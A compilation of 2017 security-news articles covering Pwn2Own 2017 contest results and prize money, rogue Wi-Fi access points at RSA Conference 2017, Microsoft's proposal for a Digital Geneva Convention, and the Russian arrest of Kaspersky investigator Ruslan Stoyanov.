There are also a series of penalties in place that contestants should be aware of. Those interested in participating are encouraged to read the complete set of rules for Mobile Pwn2Own 2017. Entrants should contact ZDI at zdi@trendmicro.com to begin the registration process.

“Since mobile device are now ubiquitous, security flaws in these platforms are coveted by criminal elements and government agencies alike. Mobile Pwn2Own helps harden these devices and their OSes by revealing vulnerabilities and providing that research to the vendors. The goal is to get these bugs fixed before they’re actively exploited,” Gorenc said.


Hackers Earn $200,000 for VM Escapes at Pwn2Own 2017

20.3.2017 securityweek Congress
White hat hackers earned more than $250,000 for the vulnerabilities they disclosed on the third day of the Pwn2Own 2017 competition, including a couple of exploits that involved escaping VMware virtual machines.

Due to the unprecedented number of contestants and entries, Pwn2Own was extended to three days this year. On the third day, participants targeted the Microsoft Edge browser and VMware Workstation.

First, the 360 Security team earned $105,000 for hacking Edge and achieving a virtual machine (VM) escape. Experts leveraged a heap overflow in Edge, a type confusion in the Windows kernel and an uninitialized buffer flaw in VMware to complete the task.

Tencent Security’s Team Sniper earned $100,000 for a VMware Workstation exploit that can be used to escape VMs. The group leveraged a use-after-free in Windows, and information disclosure and uninitialized buffer flaws in VMware.

The Zero Day Initiative (ZDI) pointed out that a complete exploit was not easy to pull off in this category due to the fact that VMware Tools was not installed in the guest operating system.

Richard Zhu, aka fluorescence, also targeted Edge, but he only earned $55,000 as his exploit chain did not result in a VM escape. The researcher leveraged two use-after-free vulnerabilities in Edge and a buffer overflow in the Windows kernel to escalate privileges to SYSTEM.

ZDI paid out a total of $833,000 for the 51 vulnerabilities disclosed at Pwn2Own 2017. In comparison, participants only earned $460,000 at last year’s event for 21 new flaws.

360 Security obtained the highest number of Master of Pwn points this year, earning them 65,000 ZDI points worth $25,000.

On the first day of Pwn2Own 2017, white hat hackers received $233,000 for hacking Edge, Safari, Ubuntu and Adobe Reader. On the second day of the competition, experts took home $340,000 for exploits targeting Windows, macOS, Firefox, Edge, Safari and Flash Player.


Welcome to Pwn2Own 2017 – Researchers hacked Adobe Reader, Edge, Ubuntu, and Safari
17.3.2017 securityaffairs Congress

Pwn2Own 2017 is started, as usual, it is a great event to see hackers at work. In the first day, experts hacked Edge, Safari, Ubuntu, and Adobe Reader.
Pwn2Own 2017 competition held in Vancouver (Canada) is started, as usual, it is a great event to see hackers at work. In the first day Bug bounty hunters have managed to hack Microsoft Edge, Safari, Ubuntu, and Adobe Reader.

Pwn2Own 2017

This is the 10th anniversary of the Pwn2Own hacking contest, it was arranged by Trend Micro and the Zero Day Initiative (ZDI) that introduced new exploit categories.

11 Groups vie for a prize pool of $1 million, the products to hack are organized into five categories, virtual machine (VM) escapes, web browsers and plugins, local privilege escalation, enterprise applications, and server side.

On the first day, the participants earned a total of $233,000 to have disclosed exploits.

The day started with the success of a success the researcher @mj011sec from Chinese security firm Qihoo360 who earned $50,000 for hacking Adobe Reader on Windows and his team win 6 points towards Master of Pwn.

The hacker and his team exploited a jpeg2000 heap overflow in Adobe Reader, a Windows kernel info leak, and an RCE through an uninitialized buffer in the Windows kernel to take down Adobe Reader. In the process, they have earned themselves $50,000 USD and 6 points towards Master of Pwn.

Follow
Zero Day Initiative ✔ @thezdi
Boom! @mj0011sec uses 1 #Adobe and 2 #Windows bugs to take down #Reader & earn $50K. Next up is #Safari. http://bit.ly/2mJMrpl #P2O
7:53 PM - 15 Mar 2017
Photo published for Welcome to Pwn2Own 2017 - The Schedule
Welcome to Pwn2Own 2017 - The Schedule
Welcome to Pwn2Own 2017 - the tenth anniversary of the competition and our largest Pwn2Own ever. This is also our largest contest ever with over $1,000,000 USD up for the taking – and continuing what...
zerodayinitiative.com
22 22 Retweets 26 26 likes
Adobe Reader was also successfully hacked by components of the Team Sniper from Tencent Security. The hackers exploited use-after-free and information disclosure flaws to achieve code execution, and a use-after-free in the kernel to obtain SYSTEM-level permissions. The team earned $25,000 for its exploits and 6 Master of Pwn points.

Mid-morning researchers Samuel Groß (@5aelo) and Niklas Baumstark (_niklasb) partially hacked Apple Safari with an escalation to root on macOS. The duo used a use-after-free (UAF) in Safari combined with three logic bugs and a null pointer dereference to exploit Safari and elevate to root in macOS. They were prized with earn style points for displaying a special message on the targeted Mac’s touch bar, they earned $28,000 USD and 9 Master of Pwn points.macOS.

They were prized with earn style points for displaying a special message on the targeted Mac’s touch bar, they earned $28,000 USD and 9 Master of Pwn points.macOS.


Niklas Baumstark @_niklasb
First team to pwn Safari on macOS with escalation to root at #pwn2own! Was a ton of fun to pull that off with @5aelo
8:06 PM - 15 Mar 2017
112 112 Retweets 175 175 likes
In the afternoon the Chaitin Security Research Lab (@ChaitinTech) hacked Ubuntu Desktop exploiting a Linux kernel heap out-of-bound access, they earned $15,000 and 3 Master of Pwn points. This is the first time for an Ubuntu Linux hack at the Pwn2Own.

The same group reached another success at the end of the day hacking Apple Safari with an escalation to root on macOS.
The attack chained a total of six bugs, including an info disclosure in Safari, four different type confusions bugs in the browser, and a UAF in WindowServer. The team earned $35,000 and 11 points towards Master of Pwn.Master of Pwn.

The highest reward,$80,000, was assigned to the Tencent Security’s Team Ether for hack Microsoft’s Edge browser leveraging an arbitrary write bug in Chakra and a logic bug to escape the sandbox. The team of hackers earned $80,000 and 10 points for Master of Pwn.

Of course, there were also some failed attempts at the Pwn2Own 2017, the Tencent Security – Team Sniper (Keen Lab and PC Mgr) that targeted Google Chrome with a SYSTEM-level escalation were not able to complete their exploit chain within the allotted time.

The researchers Richard Zhu (fluorescence) targeting Apple Safari with an escalation to root on macOS did not complete the exploit chain within the allotted time too.did not complete the exploit chain within the allotted time too.

Team Ether had signed up to hack Windows as well, but they withdrew the entry as well as the researcher Ralf-Philipp Weinmann, who attempted the Edge hack.


Pwn2Own 2017: Experts Hack Edge, Safari, Ubuntu

16.3.2017 securityweek Congress

Bug bounty hunters have managed to hack Microsoft Edge, Safari, Ubuntu and Adobe Reader on the first day of the Pwn2Own 2017 competition taking place these days alongside the CanSecWest conference in Vancouver, Canada.

The prize pool for this year’s event is $1 million and 11 teams have signed up to hack products in four categories. On the first day of the competition, participants earned a total of $233,000 for the exploits they disclosed.

A researcher from Chinese security firm Qihoo360 earned $50,000 for hacking Adobe Reader on Windows. The hacker leveraged remote code execution and information disclosure vulnerabilities in Windows, and a JPEG2000 heap overflow in Reader to complete the task.

Adobe Reader was also cracked by Team Sniper from Tencent Security, which exploited use-after-free and information disclosure flaws to achieve code execution, and a use-after-free in the kernel to obtain SYSTEM-level permissions. The team earned $25,000 for its exploits.

Researchers Samuel Groß and Niklas Baumstark earned $28,000 for hacking Apple’s Safari web browser using a combination of a use-after-free flaw, three logic bugs and a null pointer dereference. Their attempt was only partially successful, but they did earn style points for displaying a special message on the targeted Mac’s touch bar.

The Beijing-based Chaitin Security Research Lab earned $35,000 for gaining root access to a Mac through Safari. The team exploited six flaws, including one information disclosure, four type confusions and a use-after-free.

The same team also successfully hacked Ubuntu Desktop via a heap out-of-bounds access in the Linux kernel, which earned them $15,000. It’s worth noting that this is the first Pwn2Own where participants get rewarded for finding local privilege escalation vulnerabilities.

The highest reward of the first day, $80,000, was earned by Tencent Security’s Team Ether, which managed to hack Microsoft’s Edge browser using an arbitrary write bug in Chakra and a logic bug to escape the sandbox.

Each of these contestants also earned Master of Pwn points, and the researcher or team with the highest total will receive 65,000 ZDI reward points, which are worth roughly $25,000.

Team Ether had signed up to hack Windows as well, but they withdrew the entry. Researcher Ralf-Philipp Weinmann, who targeted Edge, also withdrew his entry. Richard Zhu and Team Sniper failed to hack Safari and Google Chrome, respectively, in the allocated timeframe.


RSA Conference 2017 attendees hacked with rogue access points
19.2.2017 securityaffairs Congress

Experts at Pwnie Express discovered multiple rogue access points on the show floor that were used to hack the RSA conference attendees.
The news is very curious, the attendees at the 2017 RSA conference, one of the world’s largest security events, may have been hacked.

Security researchers at reports at Pwnie Express were scanning the conference floor when discovered a rogue access point (EvilAP attack) that were posing as known and trusted networks.

“Security testing vendor Pwnie Express has been passively scanning the airwaves on the RSA Conference show floor and has found multiple instances of EvilAP attacks.” reads a blog post published by EsecurityPlanet.com.”In an EvilAP attack, a rogue access point uses a Karma attack to trick users into thinking they are connecting to a known access point. Among the access point beacons sent out in the EvilAP attacks at the RSA Conference are common locations like Starbucks and McDonald’s.”

The pen testers at Pwnie Express confirmed that multiple users connected to a rogue access point and at least two remained connected over the course of more than a day.

RSA conference attendeed hacked

According to Pwnie Express, there were multiple Wi-Fi access points running on the RSA Conference show floor that used WEP encryption … and as you know it is quite simple to hack WEP networks.

The experts at Pwnie Express highlights the risks of connecting a rogue access point, an attacker can set up it to gain “full control of all information going into and out of the device.”

A rogue access point could also be used to deliver malicious code on the user device and launch man-in-the-middle (MITM) attacks.


Microsoft Calls for Cyber Geneva Convention

17.2.2017 securityweek Congress
Brad Smith Keynote at RSA Conference 2017

The modern digital world is as much characterized by nation-sponsored cyber-attacks as it is by criminal cyber-attacks – and Microsoft is calling for an international cyber Geneva Convention to protect business, users and critical infrastructure before it spirals out of control.

In a blog post this week, President and Chief Legal Officer Brad Smith describes The need for a Digital Geneva Convention “that will commit governments to protecting civilians from nation-state attacks in times of peace.” Within this model, he sees the tech industry as ‘a neutral Digital Switzerland’ occupying the role of the Red Cross. It is a popularized re-working of arguments presented By Scott Charney’s June 2016 paper, An organizing model for cybersecurity norms development.

Smith also spoke at this week's RSA Conference in San Francisco on the topic.

Smith believes that the time is right. “Just as the world’s governments came together in 1949 to adopt the Fourth Geneva Convention to protect civilians in times of war, we need a Digital Geneva Convention that will commit governments to implement the norms that have been developed to protect civilians on the internet in times of peace.”

Key to this idea will be an international adoption of norms; that is, shared expectations of appropriate behavior. Various organizations have been working on such norms. “UN GGE, G20, US-Sino bilateral agreement all have worked toward shaping the appropriate and mutually agreed-upon behavior in the digital domain,” explains Andrea Limbago, Chief Social Scientist at Endgame and formerly Senior Technical Lead at the Joint Warfare Analysis Center.

“Are we at the beginning of a sea change in what the international community decides is acceptable behavior?” asked Jeff Moss, founder of Black Hat and DEF CON in September, 2016. “It doesn’t have to be a treaty; it can just be a norm. The next administration is going to have to drive those norms of behavior.”

But Brad Smith goes to the next step. He is arguing for just such an international treaty loosely modelled on the Fourth Geneva Convention. Is such a treaty feasible? It would require the international adoption of norms of behavior, coupled with the ability to definitively attribute wrongdoing.

Norms

Smith explains that the norms underpinning his convention “should commit governments to avoiding cyber-attacks that target the private sector or critical infrastructure or the use of hacking to steal intellectual property. Similarly, it should require that governments assist private sector efforts to detect, contain, respond to and recover from these events, and should mandate that governments report vulnerabilities to vendors rather than stockpile, sell or exploit them.”

The first two elements are uncontroversial: governments should not attack other nations, and governments should assist the private sector in recovering from such attacks. The third, however, is difficult: it commits governments to effective cyber weapon disarmament.

The US/China bilateral agreement in late 2015 is cited as the green shoots of norms development. The two countries “made important progress in 2015 to ban intellectual property cyber-theft.” Noticeably, however, while commercial espionage was banned, political espionage was omitted. Smith’s norms, however, would effectively neutralize government agencies’ ability to hack and spy.

The US/China agreement ultimately led to several countries, including the US, voluntarily adopting ‘norms of state behavior in cyberspace’, explains Phil Quade, currently CISO at Fortinet but previously executive manager at the Department of Defense. “These norms,” he explains, “helped to establish guidelines like not stealing intellectual property for commercial gain, not attacking critical infrastructure, not using CERTs for offensive actions, and cooperating with government law enforcement in their cybercrime investigations.” But, he added, they are “designed to exclude government intelligence activities.”

“Nation states have invested too much time, attention and money into cyber warfare and espionage machines to turn back the dial,” warns Eric O’Neill, currently Carbon Black's National Security Strategist, but formerly a member of the FBI’s Special Surveillance Group. It is unlikely that governments will include themselves in the norms they might otherwise endorse.

Attribution

Accurate attribution is essential for the effective operation of norms. Without it, there would be nothing to stop individual nations flouting them with impunity. “Cyberespionage,” says O’Neill, “relies on the difficulty of attribution, anonymity, and ease of access from anywhere in the world. When the U.S. has caught Russia, North Korea, Iran and China spying, probing our critical infrastructure, attacking our business, and stealing our data, each country staunchly denied the acts.”

Put simply, irrefutable technical attribution is impossible. But based on accumulative intelligence – from SIGINT, field agents, geopolitical analysis and more – one nation’s intelligence community can definitively attribute attackers – but only to its own government. It will not reveal full information on its methods of attribution to foreign countries, leaving continuing room for doubt.

Smith’s, and indeed, Charney’s, solution is an independent international committee of experts. “In addition,” wrote Smith, “a Digital Geneva Convention needs to create an independent organization that spans the public and private sectors. Specifically, the world needs an independent organization that can investigate and share publicly the evidence that attributes nation-state attacks to specific countries.”

There are two problems here: firstly, can such an organization succeed in genuine attribution without full intelligence community cooperation; and secondly, will all nations accept that attribution? “I think the logistics that would need to be involved to somehow accurately monitor and identify who is doing what to who is nearly impossible,” comments Nathan Wenzler, chief security strategist at AsTech; “especially considering the ease in which a malicious actor can hide, obfuscate, redirect, bluff and otherwise mislead where they're performing attacks from. For an organization like this to be successful, accurate proof which all parties involved can agree is correct would be the key. But the very nature of technology today would make that difficult at best. And even if you can monitor all traffic accurately, there would still be difficulty in getting the political factions involved to agree with the findings.”

Cyber Geneva Convention

A cyber Geneva Convention (that is, the formalization of agreed norms and accurate attribution into a binding international treaty) seems unlikely. Even beyond attribution, how do you sanction nations that have flouted the norms? As Phil Quade comments, “Rogue governments tend not to pay much attention to ‘norms of behavior’.”

A treaty would require teeth. “Any plausible Cyber Geneva Convention would require agreement on sanctions for a nation member that violates the convention,” says O’Neill. “Because attribution is extraordinarily difficult, these penalties may lack teeth if the convention cannot enforce them.”

There are other problems. Quade again: “The norms are for a peacetime environment, yet the boundaries for what constitutes peacetime or wartime in cyberspace are rarely clear.”

There can be little doubt that the path to an international convention on norms of acceptable cyber behavior is difficult if not impossible.; yet it remains a dream worth pursuing. Andrea Limbago suggests the world is currently caught between the impossibility of a convention and the distinct need for one.

“In the near and even mid-term,” she said, “a digital Geneva Convention is neither feasible nor likely, but that does not detract from the necessity to pursue forums and agreements to shape those proper guardrails of behavior within the digital domain; that is, norms. Basically, there is an urgent need for working toward those same goals, while a Geneva Convention remains years, decades away if it will ever occur.”

She believes that the internet is at an inflection point, poised between what she describes as multi-stakeholder and cyber sovereignty. Keys to the former are global internet freedoms, a balance between security and privacy, social integration and an understanding of what is ‘off limits’.

The latter is complete economic, social and political government control of the internet within national boundaries. It is disguised as nationalism and typified by surveillance, censorship, propaganda and disinformation. And it is already happening in Russia, China, Iran and elsewhere. Even the United Kingdom can now be described as a surveillance state with the sweeping powers given to law enforcement and intelligence agencies via the Investigatory Powers Act.

The balkanization of the internet is already in progress. It will be a problem and a difficulty for individuals; but it could prove a disaster for the large international companies currently operating across national boundaries – such as Microsoft. Internationally agreed norms of acceptable cyber behavior ultimately leading to a cyber convention could maintain and improve the democratic nature of the multi-stakeholder global internet.


Russia arrested Ruslan Stoyanov the head of the investigation unit at the Kaspersky in ‘Treason Probe’
25.1.2017 securityaffairs Congress

Russian authorities arrested Ruslan Stoyanov the head of the investigation unit at the Kaspersky Lab in ‘Treason Probe’.
A sad news is shocking the IT security industry, the Russian authorities arrested Ruslan Stoyanov, one of the most important cybercrime investigators working for the Kaspersky Lab.

Ruslan Stoyanov is the head of the investigation unit at the Kaspersky Lab, according to the security firm he is under investigation for a period predating his employment at Kaspersky Lab. Stoyanov was involved in every big anti-cybercrime operation in Russia in past years, including the one against the components of the Lurk cybercrime gang.

“This case is not related to Kaspersky Lab. Ruslan Stoyanov is under investigation for a period predating his employment at Kaspersky Lab,” reported Forbes citing a Kaspersky spokesperson’s statement. “We do not possess details of the investigation. The work of Kaspersky Lab’s Computer Incidents Investigation Team is unaffected by these developments.”

According to the “Kommersant” the arrest may be linked to the investigation on into Sergei Mikhailov, deputy head of the information security department of the FSB (The Russia national security service).

Stoyanov and Mikhailov were both arrested in December, according to the Kommersant the investigation was exploring the receipt of money from foreign companies by Stoyanov and his links to Mikhailov.

The case appears to be very important, according to a source quoted by FORBES the details of the investigation were likely to remain private.
“A Russia-based information security source told FORBES the details of the case were likely to remain private. The case has been filed under article 275 of Russia’s criminal code, the source said, meaning it should result in a secret military tribunal. Article 275 allows the government to prosecute when an individual provides assistance to a foreign state or organization regarding “hostile activities to the detriment of the external security of the Russian Federation” (translation from source). According to the source, this can be applied broadly. For instance, furnishing the FBI with information on a botnet may amount to treason.” reported FORBES.

Who is Stoyanov?

Before Stoyanov joined Kaspersky in 2012, he served six years as a major in the Ministry of Interior’s cybercrime unit between 2000 and 2006, then he moved into the private sector.

FORBES was also informed that while Ruslan Stoyanov was working for the Russian government, he was the lead investigator into a hacker crew that extorted $4 million to U.K. betting shops under the DDoS threat.

Three members of the cyber gang were identified and arrested by the investigators.

Stay tuned.